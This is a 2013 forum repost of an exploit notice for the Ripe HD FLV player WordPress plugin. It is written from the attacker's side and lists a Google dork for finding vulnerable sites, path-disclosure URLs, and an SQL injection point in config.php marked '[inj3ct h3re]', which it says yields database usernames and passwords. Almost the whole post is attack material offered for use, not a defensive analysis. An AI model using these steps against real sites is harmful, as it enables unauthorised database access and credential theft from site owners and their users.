Praetorian503 Posted January 21, 2013 Report Posted January 21, 2013 The WordPress Ripe HD FLV player plugin suffers from path disclosure and remote SQL injection vulnerabilities.-------------------------------------------------------------------Wordpress plugins - ripe-hd-player FD/SQL Injection Vulnerability-------------------------------------------------------------------# Vendor: http://www.hitasoft.com/products.php###### Author => Zikou-16# E-mail => zikou16x@gmail.com# Facebook => http://fb.me/Zikou.se# Google Dork => inurl:"/wp-content/plugins/ripe-hd-player/"# Tested on : Windows 7 , Backtrack 5r3#####=> Exploit Info :------------------# The attacker can access to the database & get username & password ....... & disclosure the Full Path------------------#=> Exploit :------------------1#=> Full Path Disclosure :http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.phphttp://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php-------2#=> SQL Injectionhttp://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=2'[inj3ct h3re]------------------------------ <= Th3 End 'Source: PacketStorm Quote